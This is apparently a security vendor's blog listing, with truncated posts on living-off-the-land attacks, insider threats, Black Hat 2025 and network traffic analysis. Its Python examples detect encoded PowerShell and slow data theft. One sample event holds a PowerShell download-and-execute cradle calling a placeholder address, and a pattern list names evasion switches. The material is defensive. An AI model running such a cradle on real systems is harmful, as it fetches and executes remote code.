Personam.AI | Our Blog
Living Off the Land: The “Ghost” Cyber Attack Healthcare Security Teams Are Struggling to See
March 23, 2026
Chuck Faughnan, III Personam.ai
Many cyberattacks announce themselves loudly: A ransomware screen appears. A malware alert fires. A security dashboard lights up with warnings.
But some of the most dangerous attacks happening today don’t look like attacks at all.
There is no obvious malware. No suspicious executable. No clearly malicious program running in memory. Instead, the attacker quietly uses tools that already exist inside the environment.
Security professionals call this “Living Off the Land (LOTL)”.
For healthcare organizations, where networks are complex and uptime is critical, these “ghost attacks” are becoming one of the hardest threats to detect.
What “Living Off the Land” Actually Means
A Living Off the Land attack is one in which threat actors abuse legitimate tools and administrative utilities that are already present on a system or in the environment, rather than bringing malware of their own.
Rather than deploying obvious malware, attackers use trusted components of the operating system or the network environment itself. That might include tools like PowerShell, Windows Management Instrumentation (WMI), Remote Desktop Protocol (RDP), or common system utilities used by administrators every day.
Because these tools exist for legitimate reasons, traditional security solutions often treat their activity as normal. The attacker is effectively hiding in plain sight.
The concept is simple: if the activity looks like something an IT administrator might do, traditional detection tools may not flag it.
That ability to blend into routine operations is what makes LOTL techniques so powerful.
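As an added illustration (this is example code written for this page, not code from the original post or from Personam), the script below runs the kind of LOTL checks the paragraphs above describe over a handful of constructed process-creation events: it decodes PowerShell `-EncodedCommand` payloads so the hidden script body can be inspected, scores the visible and decoded content for download-cradle and evasion switches, and flags shells spawned under the WMI provider host (WmiPrvSE.exe), which is what remote WMI execution looks like on the target. The event shape borrows Sysmon Event ID 1 field names; the host, user names, the PatchAgent path and the 203.0.113.10 address are made up.

```python
import base64
import re
from pathlib import PureWindowsPath

# PowerShell switches that carry a base64-encoded (UTF-16LE) script body.
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
# Content rarely seen in routine administration but common in LOTL tradecraft.
SUSPICIOUS = [re.compile(p, re.IGNORECASE) for p in (
    r"\biex\b", r"invoke-expression", r"downloadstring", r"frombase64string",
    r"-w(?:indowstyle)?\s+hidden", r"-e(?:xecutionpolicy|p)\s+bypass",
)]
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}


def encode_ps(script: str) -> str:
    """Build the value PowerShell expects after -EncodedCommand (UTF-16LE, then base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded script if the command line carries -enc/-EncodedCommand, else None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # malformed payload: not a real encoded command


# Constructed sample events in a Sysmon Event ID 1-like shape. The host, users,
# the PatchAgent path and the 203.0.113.10 address are invented for this example.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "User": r"CORP\jadmin",
     "CommandLine": 'powershell.exe -NoProfile -Command "Get-Service -Name Spooler"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe", "User": r"CORP\nurse_station7",
     "CommandLine": "powershell.exe -w hidden -enc " + encode_ps(
         "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a.ps1')")},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe", "User": r"CORP\nurse_station7",
     "CommandLine": "cmd.exe /c whoami /all"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "User": r"CORP\jadmin",
     "CommandLine": "cmd.exe /c ipconfig /all"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\PatchAgent\agent.exe", "User": r"NT AUTHORITY\SYSTEM",
     "CommandLine": "powershell.exe -ExecutionPolicy RemoteSigned -EncodedCommand " + encode_ps(
         "Get-CimInstance Win32_OperatingSystem | Select-Object Caption")},
]


def analyze(events):
    """Run the LOTL checks over process-creation events; returns a list of findings."""
    findings = []
    for i, ev in enumerate(events):
        image = PureWindowsPath(ev["Image"]).name.lower()
        parent = PureWindowsPath(ev["ParentImage"]).name.lower()
        cmd = ev["CommandLine"]
        decoded = decode_encoded_command(cmd)
        # Scan the visible command line plus the decoded body: the encoding is what
        # hides the payload from naive command-line string matching.
        text = cmd if decoded is None else cmd + " " + decoded
        hits = [p.pattern for p in SUSPICIOUS if p.search(text)]
        if decoded is not None and image in SHELLS:
            findings.append({"event": i, "rule": "encoded_powershell",
                             "severity": "high" if hits else "low",
                             "detail": decoded, "user": ev["User"]})
        elif hits:
            findings.append({"event": i, "rule": "suspicious_command_content",
                             "severity": "medium", "detail": ", ".join(hits), "user": ev["User"]})
        # WmiPrvSE.exe is the WMI provider host: a shell spawned under it is the
        # on-target footprint of remote WMI execution (e.g. Invoke-WmiMethod).
        if parent == "wmiprvse.exe" and image in SHELLS:
            findings.append({"event": i, "rule": "wmi_spawned_shell", "severity": "high",
                             "detail": f"{parent} -> {image}", "user": ev["User"]})
    return findings


def rules_for(findings, event_index):
    """Set of rule names that fired for one event (used for the summary below)."""
    return {f["rule"] for f in findings if f["event"] == event_index}


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"event {f['event']} [{f['severity']}] {f['rule']} ({f['user']}): {f['detail'][:60]}")
```

The admin's plain `Get-Service` call produces nothing, the encoded download cradle under WmiPrvSE.exe produces two high-severity findings, and the patch agent's encoded (but harmless) inventory query comes out as a low-severity finding. That last case is the practical problem with LOTL detection in a hospital: legitimate management tooling uses exactly these features, so content checks like these need a per-host or per-user baseline of who normally runs what before they can be alerted on without drowning the analyst.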
Why Healthcare Environments Are Especially Vulnerable
Healthcare networks are uniquely difficult to monitor. Hospitals, research institutions, and healthcare systems operate thousands of devices across multiple environments, many of which cannot […]
The Hidden Cost of “Low and Slow” Insider Threats
Joseph Somori, Threat Analyst
Personam.AI
October 20, 2025
In cybersecurity, the loud threats always steal the spotlight. Ransomware, phishing, malware outbreaks — they all grab attention because they are noisy and fast. But the most dangerous attacks are often the quiet ones. They move slowly, patiently, and deliberately. They hide inside what looks like normal behavior.
I work as a threat analyst with Personam, a company focused on detecting insider threats through behavior-based analytics. My job has taught me how deceptive “normal” can be. Every day, I watch patterns of user behavior that seem ordinary on the surface: logins, downloads, file transfers. But within those patterns, I’ve seen the beginnings of insider attacks. In this role, I have learned how even the most routine actions can hide serious risks. These are what professionals call “low and slow” insider threats. I think about them often, because they remind me that trust is both powerful and fragile. You can have the best firewall, the strongest passwords, and the most advanced monitoring, but if someone already inside decides to act with bad intent, technology alone is not enough.
When “normal” turns into risk
Most security tools are built to react to obvious problems. They raise alerts when someone transfers too much data or tries to access something off-limits. They rely on rules, thresholds, and patterns we already understand. But what happens when an insider takes just enough to stay unnoticed?
That is when “normal” becomes dangerous. A few extra downloads here. A late-night login that looks like dedication. […]
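To make the "just enough to stay unnoticed" problem concrete, here is an added example (written for this page; it is not Personam's analytics and not code from the original post) that compares three ways of watching one user's daily download count. The daily counts are constructed: four weeks of ordinary activity, then two weeks in which the user takes a few extra files every day. An absolute threshold and a per-day outlier test both stay silent, because no single day is remarkable; a one-sided CUSUM, which accumulates small excesses over the user's own baseline, alarms within the first week of the drift. The slack `k` and decision limit `h` are the conventional CUSUM parameters and are assumptions for this example.

```python
import statistics

# Constructed per-user daily counts (files downloaded per day), invented for this
# example: four weeks of ordinary behaviour, then two weeks where the user quietly
# takes "a few extra" each day. No single day in ACTIVITY looks remarkable.
BASELINE = [18, 22, 20, 19, 21, 23, 17, 20, 22, 19, 18, 21, 20, 22,
            19, 21, 20, 18, 23, 19, 20, 22, 21, 19, 20, 18, 22, 21]
ACTIVITY = [23, 22, 24, 23, 22, 23, 24, 22, 23, 24, 23, 22, 24, 23]
STATIC_THRESHOLD = 50  # an absolute "too much data" rule, the kind most tools ship with


def baseline_stats(counts):
    """Per-user baseline: mean and sample standard deviation of the learning window."""
    return statistics.mean(counts), statistics.stdev(counts)


def static_rule(counts, threshold=STATIC_THRESHOLD):
    """Days on which the absolute threshold fires."""
    return [i for i, c in enumerate(counts) if c > threshold]


def per_day_rule(counts, mean, sd, z_limit=3.0):
    """Days that are individually anomalous: more than z_limit standard deviations above baseline."""
    return [i for i, c in enumerate(counts) if (c - mean) / sd > z_limit]


def cusum(counts, mean, sd, k=0.5, h=5.0):
    """One-sided CUSUM over standardised excess. k is the slack (half the shift to
    detect, in sd units) and h the decision limit. Returns (day index, statistic)
    at the first alarm, or (None, final statistic) if it never alarms."""
    s = 0.0
    for i, c in enumerate(counts):
        s = max(0.0, s + (c - mean) / sd - k)
        if s > h:
            return i, s
    return None, s


if __name__ == "__main__":
    mean, sd = baseline_stats(BASELINE)
    print(f"baseline mean={mean:.2f} sd={sd:.2f}, max single day in drift={max(ACTIVITY)}")
    print("static threshold fires on days:", static_rule(ACTIVITY))
    print("per-day z-score fires on days:", per_day_rule(ACTIVITY, mean, sd))
    print("CUSUM first alarm (day index, statistic):", cusum(ACTIVITY, mean, sd))
    print("CUSUM over the baseline itself:", cusum(BASELINE, mean, sd))
```

Running CUSUM over the baseline window itself never reaches the limit, which is the check worth doing before trusting `h`: the slack `k` is what keeps ordinary day-to-day variation from accumulating. The trade-off is the one the post describes from the other side: the smaller the daily excess an insider is willing to live with, the longer the accumulation takes, so the detection window is bought with patience on both sides.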
Black Hat USA 2025: Field Report
August 26, 2025
This year’s Black Hat made one thing crystal clear: cybersecurity vendors are no longer just talking about AI, they’re wiring it straight into enterprise data pipelines. Across the expo floor, whether it was the big names like Microsoft, Cisco, and Palo Alto, or NDR specialists like Darktrace, Vectra AI, and ExtraHop, every conversation centered around AI that doesn’t just analyze alerts in isolation but sits natively on network flows, endpoints, and cloud workloads.

The messaging convergence was striking. Competitors all pitched unsupervised machine learning that learns from raw organizational data, whether packets, telemetry, or identity graphs, and then turns that into “autonomous” detection. The ambition is the same: eliminate signatures, baseline normal activity, and catch anomalies in real time. The problem? Real-world performance still lags. Despite bold claims of “zero false positives,” users report persistent noise, with Vectra AI and Darktrace often called out for alert streams in which up to 50% of the flagged behaviors turn out to be benign in hybrid and cloud environments.
Still, the direction of travel is unmistakable: AI is being hardwired into enterprise nervous systems. Instead of siloed threat feeds or rule-based detectors, companies are chasing systems that continuously learn from the customer’s own environment (endpoints, networks, IoT, and cloud) and self-adapt without retraining. This is less about AI as a bolt-on tool and more about AI as the operating principle of the data layer itself.
Beyond the Logs: Why Network Traffic Analysis is the Future of Security
Chuck Faughnan
CEO, Strategic Advisor, & Investor @ Personam.ai | Cybersecurity
November 8, 2024
The pendulum has swung — again. Way back in the ‘90s, the promise of threat detection was in network traffic analysis. The state-of-the-art method of the time was anomaly detection, which purported to catch every breach. And… it kind of did that!
The problem, however, is that, by the strictest of definitions, everything is an anomaly. Did you check www.askjeeves.com every day at 12:05pm? Well, that one day you checked it at 12:10pm is an anomaly! That one day you opted for altavista.com? Anomaly! Analysts got bogged down with intense alerting volumes. So, yes, while evidence of an attacker’s tracks was likely captured, analysts were still looking for a needle in a haystack.
Enter: log file analytics. This approach became the industry standard. It worked well when networks were simpler and attacks were less sophisticated. Looking at logs provided a relatively effective way to detect and respond to security incidents. However, as networks have grown more complex and cyber threats have evolved, the limitations of log-based security are increasingly apparent. Legacy log-based systems often struggle with scalability, cost, and the ability to detect advanced threats.
It’s time to embrace a more powerful, efficient, cost-effective approach: network traffic analysis!
Limitations of Log-Based Security
Log-based solutions, such as Splunk or QRadar, often carry high licensing costs that are variable and pegged to the volume of data ingested and stored. As logging utilization increases, so does cost. So there’s that consideration. But what do you do if […]
